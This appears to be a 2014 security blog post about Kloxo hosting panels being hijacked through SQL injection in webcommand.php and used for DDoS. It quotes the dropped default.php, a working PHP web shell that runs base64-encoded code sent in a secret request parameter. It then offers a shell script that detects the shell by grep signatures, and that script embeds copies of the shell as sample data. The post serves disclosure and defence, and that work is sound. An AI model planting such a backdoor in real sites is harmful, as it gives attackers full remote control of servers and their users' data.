Tuesday, January 28, 2014

Kloxo Compromised & Hacked With an SQL Injection Vulnerability


Kloxo is a free, open source web hosting control panel that lets a server administrator manage web servers, database servers, DNS servers and much more through a graphical interface.

Kloxo is now outdated, and the last issued update was over two years ago.

After zPanel turned out to be vulnerable last month, Kloxo, another free control panel, is today's victim.

According to a thread on VPSBoard, compromised Kloxo servers are spawning a huge number of httpd processes and sending out large volumes of traffic as part of a DDoS.

The affected servers are having their Kloxo installations compromised through an SQL injection in the webcommand.php file, which grants the attacker Kloxo admin access.

The attacker then uses display.php to drop a file called default.php into every Kloxo account, and changes the owner of that default.php to root.

The injected default.php contains the following code:
<?php
// Run with no time limit and with error reporting switched off, so the shell never leaks an error message.
set_time_limit(0);error_reporting(NULL);
// If the request carries the hard-coded secret parameter, base64-decode its value and execute it as PHP.
if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
// Otherwise print a bland "Access denied." page so the file looks harmless to anyone who stumbles on it.
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>
The above code is a classic web shell: it looks for a request parameter with the hard-coded name 8ba7afbaaddc67de33a3f (sent by GET or POST, since $_REQUEST merges both), base64-decodes its value and hands it straight to eval(), so whatever PHP the attacker sends is executed on the server with the privileges of the PHP process. When the parameter is absent the file simply prints "Access denied." and looks like a harmless placeholder. Just imagine all the fun you can have with someone's server if you are able to execute any command you wish.
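To find this kind of dropped shell on a server, here is a small detection script. It is an added example written for this post, not code from the original article or from the Kloxo project. It walks a hosting directory (such as /home) and flags the two indicators the post gives: a PHP file containing the eval(base64_decode($_REQUEST[...])) pattern, and a default.php owned by root inside an account. The grep also matches the $_GET and $_POST variants of the same pattern, which is my generalisation beyond the $_REQUEST sample above. The sample hosting tree it builds when run without arguments is constructed test data, and the account and file names in it are assumptions.

```bash
#!/bin/sh
# Added example, not code from the original post or from Kloxo:
# scan a hosting tree for the default.php backdoor described above.
# Indicators taken from the post: a file named default.php owned by
# root inside customer accounts, and a body of the form
# eval(base64_decode($_REQUEST['...'])).

# scan_for_backdoor DIR
# Prints "<path> owner=<user> reason=<indicators>" for every suspicious PHP file.
scan_for_backdoor() {
    find "$1" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
        reasons=""
        # Indicator 1: the eval(base64_decode(<request variable>[...])) signature.
        # $_GET and $_POST are included because the same shell is often dropped
        # with those instead of $_REQUEST (an assumption, not from the post).
        if grep -qE 'eval\(base64_decode\(\$_(REQUEST|GET|POST)\[' "$f"; then
            reasons="${reasons}eval-base64-request,"
        fi
        # Indicator 2: a default.php owned by root. The file name alone is not
        # enough, since an account may legitimately have its own default.php.
        owner=$(ls -ld "$f" | awk '{print $3}')
        case "$f" in
            */default.php)
                if [ "$owner" = "root" ]; then
                    reasons="${reasons}root-owned-default.php,"
                fi
                ;;
        esac
        if [ -n "$reasons" ]; then
            printf '%s owner=%s reason=%s\n' "$f" "$owner" "${reasons%,}"
        fi
    done
}

# make_sample_tree DIR
# Builds a constructed hosting tree (sample data, not taken from a real server):
# two accounts, one benign index.php, one copy of the shell quoted in the post,
# one variant that uses $_POST, and one harmless file that merely shares the name.
make_sample_tree() {
    mkdir -p "$1/acct1/public_html" "$1/acct2/public_html/uploads"
    printf '<?php echo "hello"; ?>\n' > "$1/acct1/public_html/index.php"
    cat > "$1/acct1/public_html/default.php" <<'EOF'
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
else{echo 'Access denied.';}
?>
EOF
    printf '<?php eval(base64_decode($_POST["k"])); ?>\n' > "$1/acct2/public_html/uploads/img.php"
    printf '<?php include "index.php"; ?>\n' > "$1/acct2/public_html/default.php"
}

# Scan a real directory if one is given, otherwise demonstrate on the sample tree.
if [ $# -gt 0 ]; then
    scan_for_backdoor "$1"
else
    sample=$(mktemp -d)
    make_sample_tree "$sample"
    scan_for_backdoor "$sample"
    rm -rf "$sample"
fi
```

On a live server run it as root against the directory that holds the Kloxo accounts (for example `sh scan.sh /home`); on the sample tree it reports acct1's default.php and the $_POST variant in acct2 but not the benign index.php or the legitimately named default.php. Treat every hit as a compromised account rather than a file to delete in isolation, because the post describes the attacker already holding Kloxo admin access.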

As a security measure, it is advised to remove Kloxo entirely and replace it with a control panel that is still maintained.

A good, easy-to-use free control panel that has been gaining a lot of popularity lately is VestaCP.
If you want a more complex free control panel to manage your virtual hosts and servers, you can always go with Virtualmin.